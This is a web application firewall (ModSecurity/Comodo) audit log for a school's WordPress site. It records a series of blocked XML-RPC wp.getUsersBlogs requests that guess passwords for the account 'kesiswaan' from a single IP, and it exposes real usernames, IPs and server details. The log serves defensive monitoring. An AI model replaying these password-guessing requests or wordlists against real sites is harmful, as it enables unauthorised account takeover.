HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b9407134-E--
--b9407134-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745080823301577 5952 (- - -)
Stopwatch2: 1745080823301577 5952; combined=4000, p1=480, p2=3347, p3=0, p4=0, p5=103, sr=93, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b9407134-Z--
--5700c234-A--
[19/Apr/2025:23:41:24 +0700] aAPSNHNa4dA2HllpK_PoxgAAAIc 103.236.140.4 42200 103.236.140.4 8181
--5700c234-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 228
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--5700c234-C--
wp.getUsersBlogs
kesiswaan
kesiswaan1984
--5700c234-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5700c234-E--
--5700c234-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745080884453232 5814 (- - -)
Stopwatch2: 1745080884453232 5814; combined=4139, p1=503, p2=3451, p3=0, p4=0, p5=107, sr=87, sw=78, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5700c234-Z--
--359f0560-A--
[19/Apr/2025:23:42:29 +0700] aAPSdUruoUXZj665VUFzoQAAAM4 103.236.140.4 42540 103.236.140.4 8181
--359f0560-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--359f0560-C--
wp.getUsersBlogs
kesiswaan
1111111111
--359f0560-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--359f0560-E--
--359f0560-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (38+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745080949278165 5844 (- - -)
Stopwatch2: 1745080949278165 5844; combined=4111, p1=496, p2=3428, p3=0, p4=0, p5=109, sr=89, sw=78, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--359f0560-Z--
--04266510-A--
[19/Apr/2025:23:43:30 +0700] aAPSsuvDiFC_ir7MDwZT_QAAAEQ 103.236.140.4 42832 103.236.140.4 8181
--04266510-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--04266510-C--
wp.getUsersBlogs
kesiswaan
scooter
--04266510-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--04266510-E--
--04266510-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745081010556498 5356 (- - -)
Stopwatch2: 1745081010556498 5356; combined=3954, p1=463, p2=3303, p3=0, p4=0, p5=111, sr=88, sw=77, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--04266510-Z--
--c251232c-A--
[19/Apr/2025:23:44:30 +0700] aAPS7nNa4dA2HllpK_Po7gAAAJM 103.236.140.4 43128 103.236.140.4 8181
--c251232c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 229
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--c251232c-C--
wp.getUsersBlogs
kesiswaan
Marketing2016_
--c251232c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c251232c-E--
--c251232c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745081070180787 5533 (- - -)
Stopwatch2: 1745081070180787 5533; combined=3928, p1=508, p2=3253, p3=0, p4=0, p5=98, sr=88, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c251232c-Z--
--e7350202-A--
[19/Apr/2025:23:45:34 +0700] aAPTLnNa4dA2HllpK_PpBAAAAIA 103.236.140.4 43456 103.236.140.4 8181
--e7350202-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 228
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--e7350202-C--
wp.getUsersBlogs
kesiswaan
Marketing2013
--e7350202-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e7350202-E--
--e7350202-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (38+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745081134612735 5367 (- - -)
Stopwatch2: 1745081134612735 5367; combined=4048, p1=497, p2=3372, p3=0, p4=0, p5=104, sr=88, sw=75, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e7350202-Z--
--6ff17765-A--
[19/Apr/2025:23:46:36 +0700] aAPTbEruoUXZj665VUFz_wAAANM 103.236.140.4 43784 103.236.140.4 8181
--6ff17765-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 229
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--6ff17765-C--
wp.getUsersBlogs
kesiswaan
marketing2012_
--6ff17765-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6ff17765-E--
--6ff17765-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745081196222589 5627 (- - -)
Stopwatch2: 1745081196222589 5627; combined=3918, p1=513, p2=3144, p3=0, p4=0, p5=150, sr=130, sw=111, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6ff17765-Z--
--20bb1a09-A--
[19/Apr/2025:23:47:38 +0700] aAPTqkruoUXZj665VUF0JAAAANI 103.236.140.4 44076 103.236.140.4 8181
--20bb1a09-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 229
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--20bb1a09-C--
wp.getUsersBlogs
kesiswaan
kesiswaan@1994
--20bb1a09-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--20bb1a09-E--
--20bb1a09-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745081258133573 5660 (- - -)
Stopwatch2: 1745081258133573 5660; combined=3965, p1=497, p2=3298, p3=0, p4=0, p5=100, sr=88, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--20bb1a09-Z--
--415abe46-A--
[19/Apr/2025:23:48:38 +0700] aAPT5kruoUXZj665VUF0PQAAAM8 103.236.140.4 44404 103.236.140.4 8181
--415abe46-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 229
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--415abe46-C--
wp.getUsersBlogs
kesiswaan
kesiswaan@2002
--415abe46-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--415abe46-E--
--415abe46-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745081318286639 5573 (- - -)
Stopwatch2: 1745081318286639 5573; combined=3930, p1=492, p2=3270, p3=0, p4=0, p5=99, sr=88, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--415abe46-Z--
--af205d40-A--
[19/Apr/2025:23:49:44 +0700] aAPUKEruoUXZj665VUF0SQAAAMA 103.236.140.4 44696 103.236.140.4 8181
--af205d40-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--af205d40-C--
wp.getUsersBlogs
kesiswaan
scotland
--af205d40-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--af205d40-E--
--af205d40-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (17+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745081384480605 5378 (- - -)
Stopwatch2: 1745081384480605 5378; combined=4024, p1=486, p2=3370, p3=0, p4=0, p5=99, sr=87, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--af205d40-Z--
--1882aa16-A--
[19/Apr/2025:23:50:48 +0700] aAPUaA6cTFSgLAHl7PpQbAAAAAU 103.236.140.4 45040 103.236.140.4 8181
--1882aa16-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--1882aa16-C--
wp.getUsersBlogs
kesiswaan
bethany
--1882aa16-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1882aa16-E--
--1882aa16-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (44+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745081448900476 5621 (- - -)
Stopwatch2: 1745081448900476 5621; combined=4002, p1=487, p2=3345, p3=0, p4=0, p5=100, sr=85, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1882aa16-Z--
--069caf1b-A--
[19/Apr/2025:23:51:49 +0700] aAPUpUruoUXZj665VUF0dAAAAMk 103.236.140.4 45336 103.236.140.4 8181
--069caf1b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--069caf1b-C--
wp.getUsersBlogs
kesiswaan
astonvilla
--069caf1b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--069caf1b-E--
--069caf1b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745081509969827 5548 (- - -)
Stopwatch2: 1745081509969827 5548; combined=3878, p1=492, p2=3224, p3=0, p4=0, p5=96, sr=94, sw=66, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--069caf1b-Z--
--55cec335-A--
[19/Apr/2025:23:52:50 +0700] aAPU4uvDiFC_ir7MDwZU5wAAAEI 103.236.140.4 45646 103.236.140.4 8181
--55cec335-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 226
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--55cec335-C--
wp.getUsersBlogs
kesiswaan
Admin098123
--55cec335-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--55cec335-E--
--55cec335-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (36+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745081570040016 5739 (- - -)
Stopwatch2: 1745081570040016 5739; combined=4093, p1=516, p2=3387, p3=0, p4=0, p5=110, sr=89, sw=80, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--55cec335-Z--
--bbb17b67-A--
[19/Apr/2025:23:53:53 +0700] aAPVIevDiFC_ir7MDwZU_AAAAFg 103.236.140.4 45952 103.236.140.4 8181
--bbb17b67-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--bbb17b67-C--
wp.getUsersBlogs
kesiswaan
verystrong
--bbb17b67-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--bbb17b67-E--
--bbb17b67-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745081633313442 5167 (- - -)
Stopwatch2: 1745081633313442 5167; combined=4024, p1=484, p2=3325, p3=0, p4=0, p5=123, sr=86, sw=92, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--bbb17b67-Z--
--b5ad7d1a-A--
[19/Apr/2025:23:54:53 +0700] aAPVXUruoUXZj665VUF01gAAANc 103.236.140.4 46256 103.236.140.4 8181
--b5ad7d1a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--b5ad7d1a-C--
wp.getUsersBlogs
kesiswaan
P@SSWORD
--b5ad7d1a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b5ad7d1a-E--
--b5ad7d1a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745081693326338 5694 (- - -)
Stopwatch2: 1745081693326338 5694; combined=3879, p1=475, p2=3233, p3=0, p4=0, p5=100, sr=86, sw=71, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b5ad7d1a-Z--
--fefadc09-A--
[19/Apr/2025:23:55:56 +0700] aAPVnA6cTFSgLAHl7PpQ2QAAABE 103.236.140.4 46568 103.236.140.4 8181
--fefadc09-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--fefadc09-C--
wp.getUsersBlogs
kesiswaan
asdfghjkl
--fefadc09-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fefadc09-E--
--fefadc09-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745081756834471 5035 (- - -)
